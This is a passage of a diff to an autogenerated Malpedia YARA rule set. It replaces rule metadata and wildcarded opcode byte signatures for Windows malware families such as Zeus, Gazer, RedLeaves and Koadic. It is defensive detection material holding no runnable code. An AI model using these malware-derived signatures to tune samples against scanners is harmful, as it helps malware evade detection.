 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "433422a9-8155-5253-967a-d468274de85b"
+		id = "4fe3f9dd-2485-552f-9a89-ff72673ef49c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zerocleare_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_auto.yar#L1-L222"
 		license_url = "N/A"
-		logic_hash = "27ba0960de329e73790bd0fb19cb3129bd1f124ee5eb512b9aca888dc53e16b5"
+		logic_hash = "5c96f3aec91f480609a26c2c5106b944c5143184de972e1c667aa8b1ec8b4815"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -83481,32 +83821,45 @@ rule MALPEDIA_Win_Zerocleare_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8518f8ffff 8bbd14f8ffff 2bc7 c1f803 3bf0 7c83 }
-		$sequence_1 = { 8b3d???????? 8d85c0f7ffff 0f438dd8f7ffff 83bdd4f7ffff08 }
-		$sequence_2 = { 85c0 751f ff15???????? 50 8d4c2404 e8???????? 68???????? }
-		$sequence_3 = { 8945f4 56 8b7508 57 8b13 }
-		$sequence_4 = { 660fd685e8f7ffff c7401000000000 c7401407000000 668908 c645fc04 8b9530f7ffff 83fa08 }
-		$sequence_5 = { ffb5f4f7ffff ffb5f0f7ffff e8???????? 83c408 85c0 7409 }
-		$sequence_6 = { c745cc00000000 8b4104 8b7c1824 8b741820 85ff 7c19 }
-		$sequence_7 = { 6b45e430 8945e0 8d80f0d64400 8945e4 803800 8bc8 7435 }
-		$sequence_8 = { 0f85d2520000 c3 55 8bec a1???????? 334508 5d }
-		$sequence_9 = { e8???????? 83c40c 85c0 744a 6a00 }
+		$sequence_0 = { eb58 833f00 7651 8b5f08 }
+		$sequence_1 = { eb06 66a1???????? 68???????? 668906 6a00 8d45fc e8???????? }
+		$sequence_2 = { c9 c3 83f903 7515 }
+		$sequence_3 = { 8d443604 50 a1???????? 57 6a01 6a00 }
+		$sequence_4 = { 80f93f 740a 80f92f 7405 4e }
+		$sequence_5 = { c9 c3 6a1c 58 e8???????? 85c0 7406 }
+		$sequence_6 = { 8b3d???????? 3bfe 744f 56 }
+		$sequence_7 = { 84db 742a ff75f8 ff75f0 ff7510 ff750c }
+		$sequence_8 = { 8bf3 6810270000 ff35???????? ff15???????? }
+		$sequence_9 = { 891d???????? 891d???????? ffd6 68???????? }
+		$sequence_10 = { e8???????? 84c0 7442 6a10 }
+		$sequence_11 = { 8d8db0fdffff e8???????? 8ad8 84db }
+		$sequence_12 = { ff15???????? 5e 8ac3 5b c20800 55 }
+		$sequence_13 = { c9 c20400 55 8bec f6451802 }
+		$sequence_14 = { 7506 b364 6a14 eb18 81fb5a5c4156 }
+		$sequence_15 = { b8d5000000 e8???????? 68e6010000 68???????? 6809080002 8bc6 }
+		$sequence_16 = { e8???????? 84c0 0f84ac000000 b809080002 3945f4 }
+		$sequence_17 = { 8b1b 81f309080002 81fb5d515047 7410 81fb4f4d4156 7408 }
+		$sequence_18 = { 5b 8bc6 c745f809080002 e8???????? 8ad8 }
+		$sequence_19 = { 0f86e3000000 8b03 3509080002 3d5c5b4550 740b 3d59495351 }
+		$sequence_20 = { 6809080002 8bc6 50 8d45fc 50 e8???????? }
+		$sequence_21 = { 57 33f6 56 50 68???????? }
+		$sequence_22 = { b809080002 3945f4 7713 807d0801 0f8598000000 }
 
 	condition:
-		7 of them and filesize < 42670080
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Gup_Proxy_Auto : FILE
+rule MALPEDIA_Win_Gazer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "83d0d192-73f0-5c37-84a4-96599a03dd8c"
+		id = "c74a4922-e38b-5cfc-86b0-8679816aca6f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gup_proxy_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gazer_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "cd4745a85ea3e99fe6039df895795db2fbf4a6914277daa87672debc92efc3be"
+		logic_hash = "168f0b268a65ddb10248870588fd54b58308fd12a6c3f9d75de33b31a206d1b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83520,32 +83873,32 @@ rule MALPEDIA_Win_Gup_Proxy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb6cb 33d1 8a8c15fcf9ffff 8b95f4f9ffff 300c02 }
-		$sequence_1 = { 33f6 ffb640834100 ff15???????? 898640834100 }
-		$sequence_2 = { c74424480f000000 c744244400000000 c644243400 e8???????? c784242002000000000000 8d4c2444 }
-		$sequence_3 = { 99 2bc2 8bf0 d1fe 6a55 ff34f5903a4100 }
-		$sequence_4 = { 0f57c0 c745dc00000000 b802000000 8bf2 f30f7f45e8 6a50 }
-		$sequence_5 = { 8bfa 8bf1 837f1410 7207 8b07 8945fc }
-		$sequence_6 = { 83f801 7c1a 0103 8b8ddcf5ffff 50 8d85f4f7ffff 50 }
-		$sequence_7 = { f30f7f851cffffff 660f6f05???????? f30f7f852cffffff 660f6f05???????? f30f7f853cffffff 660f6f05???????? f30f7f854cffffff }
-		$sequence_8 = { 660f6f05???????? f30f7f850cfaffff 56 660f6f05???????? f30f7f851cfaffff }
-		$sequence_9 = { 8a4806 8a4007 0fb6f0 c1e608 0fb6c1 03f0 0fb6c2 }
+		$sequence_0 = { 85c0 7511 e8???????? 84c0 7508 }
+		$sequence_1 = { ff15???????? 85c0 7511 e8???????? 84c0 7508 }
+		$sequence_2 = { ff15???????? 85c0 7511 e8???????? 84c0 }
+		$sequence_3 = { ff15???????? 85c0 7511 e8???????? 84c0 7508 83c8ff }
+		$sequence_4 = { 7511 e8???????? 84c0 7508 83c8ff }
+		$sequence_5 = { 85c0 7511 e8???????? 84c0 }
+		$sequence_6 = { 7511 e8???????? 84c0 7508 83c8ff e9???????? }
+		$sequence_7 = { 85c0 7511 e8???????? 84c0 7508 83c8ff }
+		$sequence_8 = { 85c0 7511 e8???????? 84c0 7508 83c8ff e9???????? }
+		$sequence_9 = { 0fb6420e 894c2408 0fb64a0f c1e108 0bc8 0fb6420d c1e108 }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 950272
 }
-rule MALPEDIA_Win_Udpos_Auto : FILE
+rule MALPEDIA_Win_Quickmute_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "98223189-2bfc-52a6-a611-fcd1eca88452"
+		id = "9346c7aa-034b-5306-98dc-f15f081cecb5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.udpos_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickmute"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quickmute_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "7c58f61902609cad456fdc9a279fa1453c4c938ca02ac1221afcfb1b15fb3e59"
+		logic_hash = "d5f635b1bfde0d275999edc49a14531f110db04930e1d0cd71d09b7e6594ac87"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83559,32 +83912,32 @@ rule MALPEDIA_Win_Udpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7410 8b0d???????? 8d95c4fbffff 52 51 ffd0 }
-		$sequence_1 = { 6a00 6a01 6800000040 8d8d1cefffff 51 }
-		$sequence_2 = { 83c404 684c040000 ff15???????? 83bd9cfefffff5 0f8fbafcffff 833d????????0a 5f }
-		$sequence_3 = { ffd6 8d955cffffff 52 8d85e0f8ffff 50 ffd6 }
-		$sequence_4 = { 68???????? 8d85e0f8ffff 50 ffd6 8b8d10efffff 51 }
-		$sequence_5 = { 3bc6 7e15 85c0 7e11 }
-		$sequence_6 = { ffd6 8b0d???????? 51 68???????? ffd6 }
-		$sequence_7 = { ffd6 8d85bcfeffff 50 8d8de0f8ffff 51 ffd6 8d957cf8ffff }
-		$sequence_8 = { c20400 e8???????? 5d c20400 a1???????? 8b5020 33c9 }
-		$sequence_9 = { 83e60f 0fb65c35e8 0fb671fd 8858fd }
+		$sequence_0 = { e8???????? 8b7c2428 57 56 8bc3 e8???????? 6a04 }
+		$sequence_1 = { ff15???????? 8b4b54 6a04 6800100000 51 57 }
+		$sequence_2 = { 8d853cfdffff 56 50 ff15???????? 83c414 }
+		$sequence_3 = { 56 8d85f0feffff 33db 50 c785f0feffff6d737663 c785f4feffff72742e64 }
+		$sequence_4 = { c645fa6c 885dfb 66c745fc5700 750c }
+		$sequence_5 = { 66833c7731 57 0f94c1 888c353cffffff 46 }
+		$sequence_6 = { 46 ff15???????? 83c404 3bf0 72e2 8d55e4 52 }
+		$sequence_7 = { 51 8d9424e2030000 52 8d842466020000 }
+		$sequence_8 = { 7402 ffd0 8345e404 ebe6 c745e084914000 817de088914000 }
+		$sequence_9 = { c78542ffffff63746f72 66c78546ffffff7957 c68548ffffff00 750f }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 146432
 }
-rule MALPEDIA_Win_Compfun_Auto : FILE
+rule MALPEDIA_Win_Crenufs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3d58a754-0068-5ddf-8df3-41773f9f7343"
+		id = "afe43d9c-690f-5ee9-b954-c5b702959ff3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.compfun_auto.yar#L1-L155"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crenufs_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "f91830d32accaa1a970b31fd97ff26cbec286fc3877ecca166a49e3ceef0861e"
+		logic_hash = "3c7a04525acb3eb4c11e5514f2c9651e3b51e0f4081d21b17236ba959340440d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83598,38 +83951,32 @@ rule MALPEDIA_Win_Compfun_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 742d 53 8d85d8fdffff 50 a1???????? }
-		$sequence_1 = { c70642434445 c7460430333935 c746082d453532 c7460c462d3436 }
-		$sequence_2 = { c746086f6c6865 c7460c6c703332 c74610536e6170 c7461473686f74 c6461800 }
-		$sequence_3 = { 85c0 0f848b000000 68???????? e8???????? 59 50 }
-		$sequence_4 = { c6460600 8bc6 5e 5d }
-		$sequence_5 = { 50 57 ffd3 894604 85c0 7433 68???????? }
-		$sequence_6 = { c7460465744d6f c7460864756c65 c7460c46696c65 c746104e616d65 c6461700 }
-		$sequence_7 = { c70647657456 c7460465727369 c746086f6e4578 c6460d00 8bc6 }
-		$sequence_8 = { 034c2460 488b442450 894820 488b4c2450 }
-		$sequence_9 = { 0344242c 8bc8 e8???????? 4889442448 }
-		$sequence_10 = { 03c1 89442420 8b442420 83c001 }
-		$sequence_11 = { 03c1 89442434 8b442430 39442434 }
-		$sequence_12 = { 03c1 4863d0 488b4c2430 488b442438 }
-		$sequence_13 = { 03c1 89442420 8b4c2438 488b442450 }
-		$sequence_14 = { 03c1 89442420 8b542438 486bd218 }
-		$sequence_15 = { 034c242c 488b442470 894820 488d542440 }
+		$sequence_0 = { 8d4dac 53 51 ff75ec }
+		$sequence_1 = { 8d442410 6a00 50 8d4e10 6a04 51 52 }
+		$sequence_2 = { 85c0 751b 3b742414 741b 0fbe4eff 4e 57 }
+		$sequence_3 = { 800d????????01 53 8bce a2???????? ff15???????? 68???????? }
+		$sequence_4 = { 57 50 ffd5 8b0f 41 51 e8???????? }
+		$sequence_5 = { 3beb 0f84fd010000 8b44244c 8b4d00 3bc8 7408 }
+		$sequence_6 = { 8dbe1a040000 57 ff7604 ff15???????? }
+		$sequence_7 = { f3aa 8b4e58 8b565c 8d442414 50 8b4304 51 }
+		$sequence_8 = { 8a450b 56 57 6a00 }
+		$sequence_9 = { 52 50 ffd5 8b4338 85c0 7505 897338 }
 
 	condition:
-		7 of them and filesize < 402432
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Himera_Loader_Auto : FILE
+rule MALPEDIA_Win_Neconyd_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "115dcecd-6236-578c-9832-50f71f100115"
+		id = "a2815a16-95e0-5db4-9058-3189995786c2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.himera_loader_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neconyd"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neconyd_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "4b810ce6519155c850bedb77ed28ec3affe4b473b14342db1fd6830f8663ee07"
+		logic_hash = "e1fd880f0f7b560832efc4f24d502d458a46d62299fa6f4e05fae094662862d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83643,32 +83990,32 @@ rule MALPEDIA_Win_Himera_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8060964200 8945e4 803800 8bc8 }
-		$sequence_1 = { 895594 894db0 8b048d00a14200 8975b4 8b440618 8b7514 }
-		$sequence_2 = { 8b4df8 8b55f4 8b048d00a14200 807c102800 }
-		$sequence_3 = { 0f57c9 f20f2aca 0f57c0 f20f2ac1 c1e91f f20f590d???????? f20f5804cd606f4200 }
-		$sequence_4 = { 8d45f4 64a300000000 894de4 c745e008000000 c645e801 }
-		$sequence_5 = { c645e557 c645e65a c645e746 c645e841 }
-		$sequence_6 = { 6bf838 894df4 8b048d00a14200 c745f00a000000 8b540718 8955e0 }
-		$sequence_7 = { 8b55f0 8b048500a14200 807c022800 7da9 807dff02 }
-		$sequence_8 = { 8b404c 83b8a800000000 750e 8b04bd00a14200 807c302900 }
-		$sequence_9 = { 8b45fc 83c001 8945fc 837dfc12 7318 8b4d08 }
+		$sequence_0 = { e8???????? 56 56 56 8945f4 56 }
+		$sequence_1 = { 85c0 7509 57 ff15???????? ebc6 6aff 57 }
+		$sequence_2 = { 8bd8 ffd7 2bc3 3bc6 7340 }
+		$sequence_3 = { 8d4c2418 e8???????? 83f8ff 8944241c 0f84e6010000 6826060000 }
+		$sequence_4 = { ff75f8 03d0 837d6806 52 ffb49d2cffffff 7407 }
+		$sequence_5 = { ff75f8 03d0 837d6806 52 ffb49d2cffffff 7407 e8???????? }
+		$sequence_6 = { e8???????? 8bf8 a1???????? 85c0 752b 8d8424e0000000 }
+		$sequence_7 = { 50 50 50 ffd6 85c0 0f867d010000 8d4801 }
+		$sequence_8 = { b9???????? 8d85b4fdffff e8???????? e8???????? 894508 eb02 }
+		$sequence_9 = { e8???????? 59 8d4594 50 ba???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 385024
+		7 of them and filesize < 326182
 }
-rule MALPEDIA_Win_Koiloader_Auto : FILE
+rule MALPEDIA_Win_Unidentified_108_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee5d9fec-2843-5af7-aeb3-cee6becb76b4"
+		id = "91d0ee32-15d3-5f4b-b0c7-e219a3fb056f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.koiloader_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_108"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_108_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "4094e110b8bc0bb992d288f6dc9a43aa3cc0b1cd494d242faeb097d68b45bf0d"
+		logic_hash = "bc8d7e8276cd214c62a44b786052de8d0d6c82c70c52e7e29cb797627cab2825"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83682,32 +84029,32 @@ rule MALPEDIA_Win_Koiloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41 83f950 72ec 8d9510ffffff 8d8d90f4ffff e8???????? 8d8d90f4ffff }
-		$sequence_1 = { b9???????? e8???????? 83c410 8945f0 85c0 0f8484030000 8bd0 }
-		$sequence_2 = { 2bf0 8b45e8 03c1 8975e0 8945e8 8bc8 }
-		$sequence_3 = { 83f844 72f5 8b45ec 8945c0 8945c4 33c0 c7458444000000 }
-		$sequence_4 = { 8b5d08 53 6a00 ff15???????? 50 ff15???????? }
-		$sequence_5 = { e8???????? 83c404 8d8d30f2ffff e8???????? 8d8d30f2ffff e8???????? }
-		$sequence_6 = { 8b45c4 c645fb00 8b3d???????? a801 7403 56 ffd7 }
-		$sequence_7 = { 8b4104 03c2 894148 8b4df8 8b55f0 8b7da8 }
-		$sequence_8 = { 03cf 740b 3801 7407 40 803c0100 75f9 }
-		$sequence_9 = { 41 3bca 72ef 8d45f8 c745f800000000 50 8d043a }
+		$sequence_0 = { 488d05c7580100 4a8b0ce8 42385cf938 7d4f 400fbece 4084f6 }
+		$sequence_1 = { 0f8493010000 488d2d3a100100 83635000 83632c00 e9???????? 48ff4318 837b2800 }
+		$sequence_2 = { 660feb0d???????? 4c8d0d44950000 f20f5cca f2410f590cc1 660f28d1 660f28c1 4c8d0d0b850000 }
+		$sequence_3 = { 7426 488d5540 803201 488d5201 41ffc0 488d4540 498bcc }
+		$sequence_4 = { 4c8d05a8310100 83e23f 488d14d2 498b04c0 f644d03801 }
+		$sequence_5 = { 488d1dd6db0100 458bc5 498bcc 48ffc1 4438040b 75f7 4885c9 }
+		$sequence_6 = { 458bc5 498bc4 90 48ffc0 44380401 }
+		$sequence_7 = { 0fb6557f 4889451f 83f201 488d05dbc90000 49c1e302 4889452f 03d2 }
+		$sequence_8 = { 488d9588000000 803201 488d5201 41ffc0 488d8588000000 }
+		$sequence_9 = { 7350 488bca 4c8d051d310100 83e13f 488bc2 48c1f806 }
 
 	condition:
-		7 of them and filesize < 101376
+		7 of them and filesize < 307200
 }
-rule MALPEDIA_Win_Bitsloth_Auto : FILE
+rule MALPEDIA_Win_Koadic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3d0de3b-9639-54f3-9dde-5c53759da2ed"
+		id = "cf49fa85-eb15-5b40-90ec-91247303052e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsloth"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bitsloth_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.koadic_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "c4f0991c5eb2b348c1fcbe6db2b4d14bd7d82664775a39a42f7ea0ad4a8658a0"
+		logic_hash = "045758b315b8841fdc586ed89736311e4ca424527e393ec057e76ad188d18c25"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83721,32 +84068,32 @@ rule MALPEDIA_Win_Bitsloth_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 68???????? e8???????? 83c404 c645fc00 8d8d64f0ffff e8???????? }
-		$sequence_1 = { c78564f9feff00000000 eb0b 1bc9 83c901 898d64f9feff }
-		$sequence_2 = { 83c408 8d8de0faffff 51 8d95bcf1ffff 52 68c50b0000 8b4508 }
-		$sequence_3 = { 8945ec 8b4d08 8b55e0 3b91a0af0600 7c02 eb44 }
-		$sequence_4 = { 50 68???????? 68???????? 8b0d???????? 51 8b15???????? 52 }
-		$sequence_5 = { e8???????? 8bc8 e8???????? 8b55bc 2bd0 8955cc 7446 }
-		$sequence_6 = { 68???????? 8b55f8 52 ff15???????? 8945fc 837dfc00 7515 }
-		$sequence_7 = { 8945c8 8945cc 68???????? 8b4d08 51 e8???????? 83c408 }
-		$sequence_8 = { 51 8b55e0 8b02 8b4de0 51 8b908c000000 ffd2 }
-		$sequence_9 = { 3b8568ffffff 721d 6a00 6a00 681f520000 e8???????? 83c40c }
+		$sequence_0 = { 42 895114 e8???????? 8901 833900 7407 8b01 }
+		$sequence_1 = { 7419 0fb608 33ce 81e1ff000000 c1ee08 33348d48154100 40 }
+		$sequence_2 = { 83c201 8955f8 8b4508 0fb64801 81e1c0000000 81f980000000 }
+		$sequence_3 = { 52 8b1401 52 ff15???????? 85c0 0f8e08010000 8b0f }
+		$sequence_4 = { 894804 5b 83c40c c3 0f8ed6000000 8bc7 99 }
+		$sequence_5 = { e8???????? 8b4c2410 5f c6040e00 5e 59 }
+		$sequence_6 = { 58 894514 8b442404 50 58 894518 8d44240c }
+		$sequence_7 = { 3b442404 7c54 ff742404 8b6c2420 }
+		$sequence_8 = { 57 8d45f8 50 56 53 ff750c ff15???????? }
+		$sequence_9 = { ff15???????? 8bf8 8d5f01 53 6a00 }
 
 	condition:
-		7 of them and filesize < 677888
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Cloudwizard_Auto : FILE
+rule MALPEDIA_Win_Skip20_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fa68961f-75e7-584f-a390-9baec9fbd3c5"
+		id = "15b7373a-f84f-57db-8d95-802539d58928"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cloudwizard_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.skip20_auto.yar#L1-L102"
 		license_url = "N/A"
-		logic_hash = "b90f140d158cbf9ceed90cefa4231cadc7a59a82c187cabca82f362a5d65baf4"
+		logic_hash = "9f59196702302927edbd3dc2784c10dacebf31e2e8430b74641bf84000e5924e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83760,34 +84107,32 @@ rule MALPEDIA_Win_Cloudwizard_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740b c700???????? 897004 eb02 33c0 8945ec 8365fc00 }
-		$sequence_1 = { d1f8 51 8d844618060000 50 e8???????? bf???????? 8bc7 }
-		$sequence_2 = { c645c74d c645c846 c645c95c c645ca7e c645cb49 c645cc5a }
-		$sequence_3 = { 668945d6 58 6a49 668945d8 58 6a18 668945da }
-		$sequence_4 = { 8983240e0000 5b c9 c20400 55 }
-		$sequence_5 = { 663930 75f5 8d45e8 50 }
-		$sequence_6 = { 668945f0 58 668945f2 6a47 58 668945f4 6a46 }
-		$sequence_7 = { 40 40 66833800 75f4 }
-		$sequence_8 = { 7506 56 e8???????? 6860ea0000 ff15???????? 837e3000 }
-		$sequence_9 = { 6685db 75f6 03c0 50 2bca 8d4560 }
+		$sequence_0 = { 740d ffc9 75bf 0fb705???????? eb10 0fb705???????? }
+		$sequence_1 = { 8b15???????? 85d2 7430 8bc7 488d0dfe000200 }
+		$sequence_2 = { b22a 488bcb e8???????? 440fb65f35 4180fb02 750f }
+		$sequence_3 = { 0fb74804 66890b 4883451006 e9???????? 4183fe28 7529 }
+		$sequence_4 = { 7516 48634b3c 4803cb 0fb74114 8b540824 4803d3 8b7c0820 }
+		$sequence_5 = { e8???????? 488d0d3cdaffff e8???????? 488d0d50dbffff e8???????? }
+		$sequence_6 = { c7842418010000ec586548 c784241c0100008b042530 664489ac2420010000 4488ac2422010000 }
+		$sequence_7 = { 8b0d???????? 488bd8 ff15???????? 4883fb01 7466 }
 
 	condition:
-		7 of them and filesize < 134144
+		7 of them and filesize < 794624
 }
-rule MALPEDIA_Win_Dlrat_Auto : FILE
+rule MALPEDIA_Win_Redleaves_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c5494bd6-4fc0-5b83-8b92-b9ca3f87216d"
+		id = "9f7b8b12-c503-5485-9c53-56cd6e66e380"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dlrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dlrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redleaves_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "fad702107ce086ed634b62a81fd30395fc9fa896e743ae2abff0224916d86383"
+		logic_hash = "3dce4e217425a30687e485e0f532b16bc2ee15eb23b5abe81e3322015aee4687"
 		score = 75
-		quality = 75
+		quality = 69
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -83799,32 +84144,40 @@ rule MALPEDIA_Win_Dlrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488d0d15201100 e8???????? 4889c6 488d0526e60f00 488945b8 48c745b008000000 }
-		$sequence_1 = { eb40 be08000000 488d15ac540200 448bc6 488bcf e8???????? 85c0 }
-		$sequence_2 = { 4a8b14d1 41b8e00b0000 4e8b0c02 4c894df0 4d8b9188000000 498b4a18 488b5108 }
-		$sequence_3 = { 4c8d4e08 41b801000000 488d15a7c21500 488955b8 4c8945c0 4c894dc8 48833d????????00 }
-		$sequence_4 = { 48898528ffffff 4883bd20ffffff00 755e 8b05???????? 65488b0c2558000000 488b04c1 b9480b0000 }
-		$sequence_5 = { 4c8bcf 4531c0 ba230b0000 488d0d04260e00 e8???????? 488995e0fdffff 4c8bce }
-		$sequence_6 = { 4c8d0dec530e00 4c898d68ffffff 41ba0f000000 4c899560ffffff 4c8d8d60ffffff 488d0d8ae60e00 48898d78ffffff }
-		$sequence_7 = { 488bcb e8???????? 4889c1 e8???????? 408a7d28 4c8d4e08 41b801000000 }
-		$sequence_8 = { eb02 31c9 4c8b5510 493b8aa0000000 0f8280000000 488d0d40b71400 4883ec20 }
-		$sequence_9 = { 488955b8 48c745b008000000 4c8d45b0 488d1d6f741000 48895dc8 48c745c011000000 488d55c0 }
+		$sequence_0 = { 89f9 8d64241c d2c0 8a01 }
+		$sequence_1 = { 51 7565 7279 55 7365 7254 }
+		$sequence_2 = { 11d2 83e901 0f85edffffff 89d0 29f8 5f 5b }
+		$sequence_3 = { 9c 894504 9c 9c }
+		$sequence_4 = { 47 657449 7041 64647254 }
+		$sequence_5 = { 57 54 53 51 7565 7279 }
+		$sequence_6 = { 7440 ff7508 ffd0 59 }
+		$sequence_7 = { 60 9c e8???????? f8 }
+		$sequence_8 = { 6a0c 81c100020000 51 6a26 }
+		$sequence_9 = { 5b 85ff 7509 49 48 c745fc7a000780 }
+		$sequence_10 = { 54 9c 60 9c }
+		$sequence_11 = { 8bec ff7508 81c160010000 e8???????? }
+		$sequence_12 = { 85c0 746b 53 53 }
+		$sequence_13 = { 83662000 33c0 40 5e }
+		$sequence_14 = { 8bec ff7508 81c17c010000 e8???????? }
+		$sequence_15 = { 8bec ff7508 81c104010000 e8???????? 33c0 40 5d }
+		$sequence_16 = { 9c 8f442428 880424 e8???????? }
